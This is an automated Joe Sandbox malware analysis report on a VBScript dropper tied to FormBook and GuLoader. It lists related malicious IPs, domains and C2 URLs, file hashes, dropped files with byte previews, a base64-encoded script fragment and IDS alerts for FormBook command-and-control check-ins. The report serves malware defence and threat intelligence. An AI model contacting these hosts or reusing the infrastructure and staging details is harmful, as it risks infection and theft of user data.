                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                          Run name:Suspected Instruction Hammering
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winVBS@9/9@19/14
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 102
                          • Number of non-executed functions: 310
                          Cookbook Comments:
                          • Found application associated with file extension: .vbs
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Execution Graph export aborted for target kCwueywDTS.exe, PID 7976 because it is empty
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:58:24API Interceptor30690458x Sleep call for process: cmdkey.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.230.15.3PI#220824.exeGet hashmaliciousFormBookBrowse
                          • www.home-check.shop/bnkv/
                          PI #9100679047.exeGet hashmaliciousFormBookBrowse
                          • www.home-check.shop/bnkv/?gLc=/5QgBjN+yJdAzvcZCt4eP8i3DnJK5XNl3uzWmgM8d8MC5ZQTws0uiDggHIyw4qbfmIcCQ3LYRcUh0wEwo4kfyNMgeeSg6Nykxx6TeT0vJ0XBmefyUlVmHAw=&6fQ=evG0
                          Shipping Documents.exeGet hashmaliciousFormBookBrowse
                          • www.home-check.shop/bnkv/
                          Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.home-check.shop/ns8q/
                          BL6387457290.exeGet hashmaliciousFormBookBrowse
                          • www.home-check.shop/bnkv/
                          Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                          • www.home-check.shop/bnkv/
                          176.57.64.102031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                          • www.ayypromo.shop/rgqx/
                          Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                          • www.ayypromo.shop/rgqx/
                          Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.ayypromo.shop/mktg/
                          TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                          • www.ayypromo.shop/6ocx/
                          199.103.62.205Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                            47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              18.183.3.45031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                              • www.cannulafactory.top/l90v/
                              Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                              • www.cannulafactory.top/l90v/
                              RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                              • www.cannulafactory.top/l90v/
                              APS-0240226.exeGet hashmaliciousFormBookBrowse
                              • www.cannulafactory.top/l90v/
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.cannulafactory.top/y82c/
                              76.223.54.146eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                              • seedslinger.com/
                              DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                              • www.cyclope.us/ihwe/?3Xd=mTJJEVG0F8jFAtwU7sWFzHnY2qdbwq8bIjLbd/2BgPl3ej9dAajyohM4CFOoEo0iSeZJ1vy9jXjIFITPu/LcHKLhmuYSqduohLM0hC1HuoYJVWtnxk93XAg=&Cdl=szJ4
                              kuxTSQA74q.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.promoplace.online/m9so/
                              V7NfU9XOI3.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.promoplace.online/m9so/
                              E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.theretroempire.com/my26/?pTAl=3CSdZgWd8xkK9u7lXUUacLi0ACnw9R7lUg1eP2pCg85c/BeOqaozbHw2CEGF77Kuky4+&z0=VhCtQhupL678shG0
                              E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.theretroempire.com/my26/?6lo8sx=KtF83LWPF&_fvPp=3CSdZgWd8xkK9u7lXUUacLi0ACnw9R7lUg1eP2pCg85c/BeOqaozbHw2CEGF77Kuky4+
                              E-dekont.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.theretroempire.com/my26/?_Vi=3CSdZgWd8xkK9u7lXUUacLi0ACnw9R7lUg1eP2pCg85c/BeOqaozbHw2CEGF77Kuky4+&bthXXP=tZhp

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              www.itemfilterhub.shopPro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 104.21.50.202
                              www.bullbord.topRequest for Quotation + sample catalog.vbsGet hashmaliciousFormBookBrowse
                              • 203.161.46.205
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 203.161.46.205
                              www.magicface.shopPI#220824.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              Shipping Documents.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 13.248.169.48
                              Mac Purchase Order PO102935.xlsGet hashmaliciousFormBookBrowse
                              • 76.223.54.146
                              www.meetfactory.bizPro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 96.126.123.244
                              TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                              • 45.33.30.197
                              www.ayypromo.shop031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 176.57.64.102
                              TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              www.home-check.shopPI#220824.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Shipping Documents.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 185.230.15.3
                              BL6387457290.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              www.hypepgbet.onlinePro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 82.112.244.92
                              www.cannulafactory.top031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                              • 18.183.3.45
                              Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                              • 18.183.3.45
                              RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                              • 18.183.3.45
                              APS-0240226.exeGet hashmaliciousFormBookBrowse
                              • 18.183.3.45
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 18.183.3.45

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CIRRUSTECHLTDCAAnfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 199.103.62.205
                              47#U0627.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 199.103.62.205
                              g5oo6DQ4pd.exeGet hashmaliciousUnknownBrowse
                              • 208.69.57.105
                              OQchDohurA.exeGet hashmaliciousRaccoon SmokeLoaderBrowse
                              • 192.228.108.27
                              VIALIS-MOSELLELocatedinMetzFranceFRPI#220824.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Shipping Documents.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 185.230.15.3
                              BL6387457290.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              Shipment Files EG240711& EG240712.exeGet hashmaliciousFormBookBrowse
                              • 185.230.15.3
                              botx.mips.elfGet hashmaliciousMiraiBrowse
                              • 85.95.220.118
                              5No3fHe5eO.elfGet hashmaliciousMiraiBrowse
                              • 85.95.220.115
                              5fKXb0QE05.elfGet hashmaliciousMiraiBrowse
                              • 89.28.148.110
                              GaReqLie1fGet hashmaliciousMiraiBrowse
                              • 89.28.148.100
                              TELINEABA031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 176.57.64.102
                              TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                              • 176.57.64.102
                              sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
                              • 88.214.61.219
                              KE4cyjDEDO.elfGet hashmaliciousMiraiBrowse
                              • 88.214.61.224
                              http://91.223.169.83Get hashmaliciousUnknownBrowse
                              • 91.223.169.83
                              2hUhvRdIqt.elfGet hashmaliciousMiraiBrowse
                              • 88.214.61.255
                              PkQB1rE5kK.elfGet hashmaliciousMiraiBrowse
                              • 88.214.61.240
                              mUZS5TqzCm.elfGet hashmaliciousMiraiBrowse
                              • 45.93.94.133
                              AMAZON-02USLinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                              • 18.228.165.84
                              OmnibeesReservas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                              • 18.228.165.84
                              https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                              • 52.217.205.32
                              LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                              • 18.228.165.84
                              http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse
                              • 13.35.58.117
                              SALARY OF AUG 2024.exeGet hashmaliciousFormBookBrowse
                              • 13.248.243.5
                              https://buy-korea-online-f85b.vercel.app/?web=seunghun.lee@hdel.co.krGet hashmaliciousUnknownBrowse
                              • 76.76.21.93
                              https://odyqreazchfhphegqov.medtourindia.ru:8443/impact?impact=reachusGet hashmaliciousHTMLPhisherBrowse
                              • 13.35.58.31
                              https://terms--policies.vercel.app/Get hashmaliciousUnknownBrowse
                              • 76.76.21.93
                              https://yoge0104.github.io/Yoge0104Get hashmaliciousHTMLPhisherBrowse
                              • 46.137.27.48

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • 199.103.62.205
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 199.103.62.205
                              tsnsd8pOvn.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 199.103.62.205
                              xnxx.exeGet hashmaliciousUnknownBrowse
                              • 199.103.62.205
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 199.103.62.205
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 199.103.62.205
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • 199.103.62.205
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • 199.103.62.205
                              4d847.msiGet hashmaliciousUnknownBrowse
                              • 199.103.62.205
                              danf082024xml.msiGet hashmaliciousUnknownBrowse
                              • 199.103.62.205

                              Dropped Files

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dllAnfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                Anfrage f#U00fcr ein Angebot - Musterkatalog.vbsGet hashmaliciousGuLoaderBrowse
                                  Quote - QUO0000_06272024.exeGet hashmaliciousGuLoaderBrowse
                                    Purchase Order06272024.exeGet hashmaliciousGuLoaderBrowse
                                      Purchase Order2883.exeGet hashmaliciousGuLoaderBrowse
                                        Quote - QUO0000_06272024.exeGet hashmaliciousGuLoaderBrowse
                                          Purchase Order2883.exeGet hashmaliciousGuLoaderBrowse
                                            Purchase Order06272024.exeGet hashmaliciousGuLoaderBrowse
                                              Sinchrones_000965_MEC_10.08.23pdf.exeGet hashmaliciousGuLoaderBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\45-0FIUV

                                                Download File
                                                Process:C:\Windows\SysWOW64\cmdkey.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                Category:dropped
                                                Size (bytes):122880
                                                Entropy (8bit):1.1414673161713362
                                                Encrypted:false
                                                SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                MD5:24937DB267D854F3EF5453E2E54EA21B
                                                SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nsb9D0E.tmp\System.dll

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):6.021689811183493
                                                Encrypted:false
                                                SSDEEP:192:S9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:SJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                MD5:8508FA0AB17E36E071687243283C2AEF
                                                SHA1:D45391D0454FBB9EB66FA72ECF0E2CADF0522BFE
                                                SHA-256:90F3CEBB5B3759EB1BD72CEE7CD8B694440EE398FE970B763DB7A7B67208E4C8
                                                SHA-512:241CF26E57006402897D8ADAFF37F3006C1BDBB09D6C5D10C32D556996DF5785DC81C35CCBBC74384F80853A3E4AEA7BE251A4FA2613BE42108E11A00692DF5A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs, Detection: malicious, Browse
                                                • Filename: Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs, Detection: malicious, Browse
                                                • Filename: Quote - QUO0000_06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order2883.exe, Detection: malicious, Browse
                                                • Filename: Quote - QUO0000_06272024.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order2883.exe, Detection: malicious, Browse
                                                • Filename: Purchase Order06272024.exe, Detection: malicious, Browse
                                                • Filename: Sinchrones_000965_MEC_10.08.23pdf.exe, Detection: malicious, Browse
                                                Reputation:moderate, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t..!...!...!...T...!...Y...!...!...!...T...!...T...!...T...!...T...!..Rich.!..........................PE..L...s..d.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\x.exe

                                                Download File
                                                Process:C:\Windows\System32\wscript.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:dropped
                                                Size (bytes):757008
                                                Entropy (8bit):7.643379129614274
                                                Encrypted:false
                                                SSDEEP:12288:5ZCgwRmWooxcQTjJ/xBnzIokc1G0mRRNqfivjcha2RDIkLsQVl:5LfhHAd/5bWRNqftLsWl
                                                MD5:36EFC401E52E98CD1C735D8A767A1E6D
                                                SHA1:3CF04490CAF786A71855B16F9D9C9DC07C64455D
                                                SHA-256:A4F48C60654A5880B88AFC9DC898B52EC61DDEB733207E410F3748287C892508
                                                SHA-512:35B83DC4F672BA7114BE63BDB097F56677579B647AA88BF121F910F633F395568E231079433E3C5010BB9F88567B30B15C70F2B36FF00F759866E5E69D83A9EB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>..}P.}P.}P...T.}P...V.}P...Q.}P.}Q..}P.X.T.}P.X...}P.X.R.}P.Rich.}P.................PE..L......d.................j....9......4............@..........................`@......k....@.................................p........P<..............y.. ............................................................................................text...vh.......j.................. ..`.rdata..t............n..............@..@.data...@.9.........................@....ndata... ...0:..........................rsrc........P<.....................@..@........................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Fugtens.Gri

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):457666
                                                Entropy (8bit):2.6428606515524327
                                                Encrypted:false
                                                SSDEEP:1536:9qm6LBR/NUjWBj3RK1JRURUPkBjRIJTb1r1FE5vtXADKc2EfyjrSWPR4Gk5lcR8l:oFtw1I++5Ae02E2VYX7DkZdBS1DE2Z
                                                MD5:4A8B957C3A18FD46611553D2A04E0404
                                                SHA1:F12221D0392D65C8ED3BB8EDEFE3C8113FB1B125
                                                SHA-256:48C3C2AF70B880C6949EB6E2B00947922492D469D98BD71EFCAA24B516766CCA
                                                SHA-512:4F90312608E93CA18BB9E88EA887F8E2B2005EA0FE97FEF679D589543F9AD1C33EC2ACDB5843455B63B197CD96250DCF9CAA12DE09C2216D2D82924F92E5152B
                                                Malicious:false
                                                Preview:002E00EC000000414100C100E00073005B00001C00004C4C00000000888800E5E5E500000013008D000000007E7E7E000E0E003030002D000000B000D40094940000C100BB00FD0000B5B50061000000000000DCDC0000FEFEFEFE0000005B0000ADAD0042003B3B0083830044444400000000DC000A0A0A0A000000008A8A000000AA00D400000000000000000B00B100D900001111000909000000EC000049000042001D1D1D004200545400005A5A00C5C5003A00D0D0D0D0006262000000B800002525000000999900000000400000070707000000350028282800F9F9000000A40000F8F8000000676767676700B1B10000DDDD000000000000900000D2002900000000001500230000C800000000000000005E001E00006F0000003535353500A9007A7A0000000000000B0000009F9F000000CA006600C400000000000000000000E0E0E0E00000B3B300000000B100DEDEDE009300001515001A0030303000A0000000190093007C7C00606060606000000099999999001B00190000EEEE0000BD0000190000001F1F1F1F1F0000EB00007C0000FBFBFBFBFB00000000B0B000001B1B1B00000000A000D70000272727000A0022222222222200FDFDFDFD0000000000C5C5C5C50000EDED00C5C5C500009F9F9F9F005E0082828200350000610000AC00000031000000006464646464

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote\albuquerque.jer

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):335249
                                                Entropy (8bit):1.2457536185033387
                                                Encrypted:false
                                                SSDEEP:768:z7X3OpuJLln4NHehXm71SCUVbrqAIMv+2/b4V2P3u3WK7N8Bf3OK25EJVKkDhzCF:/KtvU3Q+WaYCvzP/T308dU9Jt
                                                MD5:301C0542B3A4F12751237E7D66AB87E7
                                                SHA1:22047C1DF9DBBCD9629B38893FA7294C0956914D
                                                SHA-256:A3564ECFD5EE16655709BA738EA111285494A4950A40B5E9DF6C3F7853EEDC7F
                                                SHA-512:BE76B52F6901BB470C3F562F33B72C5883AADE81ABD6658BDF6E569969617195CB736AF1842890058421BB273C51A72683F14E77D15D0EDBDFC119AC41EA39B9
                                                Malicious:false
                                                Preview:.......................................Y.........O........Z.................................."...................................G..................................................................z................K...........,.....<.8................................../....................................................................................A...9......................`...................#............J.........u........................................................S........Fy.....2........................................................................................................P...........Pp...._..........O....a.......................;...F........................................."......................B..........n..?....................|...................................2.............b........M.................................H...........[........^..U.......e..........P........................`.............r............................................................

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote\alpasotes.fly

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):314428
                                                Entropy (8bit):1.2438484306136453
                                                Encrypted:false
                                                SSDEEP:768:dCKtpgJr83BA79OLaRtFEA5cd2XMTPo2C1hNM5/Vvtdh4uwPYCP8LUS9tp9hd4aH:dZiSUi/ore/T4jSjjWacNg1llIx3f09
                                                MD5:E5E18855ACC6A11A45D0D13A2BC6CDB6
                                                SHA1:8B54E9570E511A1049704CCCAC783B5D75379CED
                                                SHA-256:FACDDD60C2D25AE9B18FB1FE559ECFB027F4F5D0779C1687ED7BD715E290A8D0
                                                SHA-512:9A4DE5B8654A0F1F1655341BC1B4206D04F5A8CC48A837020AE2B14414BD39D4D84E52DDD4E4554A4B51AE2ABCBAA3B74327DA25F15C5A1E87547209E5C2A223
                                                Malicious:false
                                                Preview:...................V...w.......................................K...................................<.....................................................^..P..................................S................................................................._...q...............................E............................N.,..............................................q..................................................;........&.......................................................................D...................................*..............................................)...V...........................................l...............d......................................................................................................T..................................................N.....K...................Q................................o.........W...................z................................................$.........................................................

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Heteromastigote\mourids.txt

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):498
                                                Entropy (8bit):4.220963799226289
                                                Encrypted:false
                                                SSDEEP:12:Wni6jtZtFxq8OAkFkyVMVPNft+HzA92oQTj0AmCAMYmgEr:WiErSHVM1NOTjyDMYmTr
                                                MD5:371A762DB20650DD795210D34000F4D2
                                                SHA1:CF39E990575AD68DCE8F74BA3EDFBA31468619D3
                                                SHA-256:A61AC9BC9DBDC35BEA83CFFEF578649FCF318F62A519A329B5A5540C582DE100
                                                SHA-512:A7588050A2DC1C43F59828769AEAA40CC8D9A10AE2773788E7D1A42759E4271339995BE521E1DDFEE3E1E780111D750E1EC1E6E9FE7D807A5C3CB9AFBDBAFEF1
                                                Malicious:false
                                                Preview:gwens exempted kimos telegraferingens omstdendes.gleets improficience samlebaandsarbejdernes trichloroethylene doupioni amatrfotografernes foelelsesladet..gaudier sttyskerne rvejagternes.meningitissens toptiens ripened cocillana tullibee histometabasis gamelike venstrepresser beskyttelser kendelsers..underkursernes emanuella inddm strafansvar skiftingen isflagen,macrodactylous lamslaaedes konditallene supertare alvorstalers heltidsbeskftigelses gospelise bihulerne cubalaya benzindksel fiffig..

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Intermedius.Sta

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):212211
                                                Entropy (8bit):7.553469024606494
                                                Encrypted:false
                                                SSDEEP:3072:WvmeO3thVO+pJUkgwonLdgysRSywzWwFo51lmfHfh5Pc+j2cBE8J4XJE+:WvG3thk+/1ynORSZiwFwu//8e4X/
                                                MD5:DC1C7CBE79032AC12FE95D7D6CBCA90D
                                                SHA1:D2C1A0C2736ED0BBED70E8F55640AA3C630D7096
                                                SHA-256:5F759A3264AB74C9F959D7745F54DC39B2587D634A4DCB4245148C4536062E03
                                                SHA-512:FAB78218EC7BD8B05E1AEF0FD58CEDE95F20E4670074AC8F923A97F671AA9A7CEEEB834BD5A53F1BB75A678ED7406BF6296E445948536001CF60638F62526C2F
                                                Malicious:false
                                                Preview:........................... .....SSS.E....||....>>...444............................................................................................................||.......!....................__..............................ll.....pp..............mm.***.......ee..................;;...................~~~......yy..~~~~~~.W..v.d...................YY.........3..............&&&&........................--...........ww.r.......--..).|................<...............aa................................WW.....|.....................f..V...........................................................^^^...........G................. .........u......:.<..........:...........#.....Z....................................(.www......1......................QQQQ........VVV.....""""......................GGG........H......7.......PPPP...............jjjj.....))..H..M.tt..3...........x.......rr.8...33.......UU...I...................S............."""...gg.<<<<<.V................EEE.........kk......>>..............

                                                C:\Users\user\AppData\Local\Temp\zamindari\Millenarian233\Nunneries.sub

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):292960
                                                Entropy (8bit):1.2562120543510875
                                                Encrypted:false
                                                SSDEEP:768:Ata7tm7RWWlp29ZCMz+vsS/zMRb5xH5/z41RAKozj/hBzOsREA8mEs4p/QsO6mGE:iNMh2nK8E90bM+aad
                                                MD5:8B035F50B7D03E8E3C12C4A7E9EF0416
                                                SHA1:C40DDFD166A8A2A57DE34C6E6F0EAA737F562523
                                                SHA-256:0370251F5DD197ECE0EA8A41F159FDDC42D7A1CD91608156DDF57BF7FF6340C1
                                                SHA-512:51F7301F04A81B9F7341273C6D9AFC942AC1318A63B9C9BEB60389E3C22DC1741DF62AFF2C9986FCA787370CEF6DA2EE4DD062DA8F6436B0095C1872B065D9C3
                                                Malicious:false
                                                Preview:.c......................................G....e....................................................................B..............Ys.....v...[...............................................................................................;...........................................y......d...........................................a.........................j...f......<.............................................................h#.C...........%...................................*..................}..................................0..............................................0....v.........U.b....I...........................u.........................................................sP.a........................................................................!...............0................/....U.......Q.......................................7.........o.....................................z...................;........?..?.....{....................w........................................

                                                Static File Info

                                                General

                                                File type:ASCII text, with very long lines (65489), with CRLF line terminators
                                                Entropy (8bit):5.57972950050386
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs
                                                File size:1'168'335 bytes
                                                MD5:62f8514c35c5abc8a6138ff3029a9af7
                                                SHA1:9835d6cc79ed8cc63c13171cfd9d87efec7467a0
                                                SHA256:15c644bdde76746a5798daa41fc25ac5f2a999d1fe6e11b1e47f7b328e7a1722
                                                SHA512:69e668c8bbeb1a41fd13b43db162d5a8529cd0c01f2e169328577114ab9e87240967e0650cc485274a26e2ee9fb1065363432b26c0c041b9f89569b0e585acff
                                                SSDEEP:24576:UeSzCyPcxJchNyCz5TsdTMhfkTMZoFU/7UcsKyL5g5:yzE+8Cz5ir5cNya
                                                TLSH:F145E1A6FF337E86791C41C68E124BCABCA80CBD4451D6E6B49DF5A8304C4B3199EE1D
                                                File Content Preview:' Initialize the base64 string..Dim base64Str..base64Str = ");;qQ****M********E********//8****Lg******************Q**********************************************************************************************4**********4fug4**t**nNIbg..)M0h;;Ghpcy..wcm9n

                                                File Icon

                                                Icon Hash:68d69b8f86ab9a86

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                2024-08-27T08:05:03.914656+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314992680192.168.11.20154.23.184.207
                                                2024-08-27T08:01:05.754850+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314988680192.168.11.20176.57.64.102
                                                2024-08-27T08:03:52.347239+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314990580192.168.11.2023.231.158.3
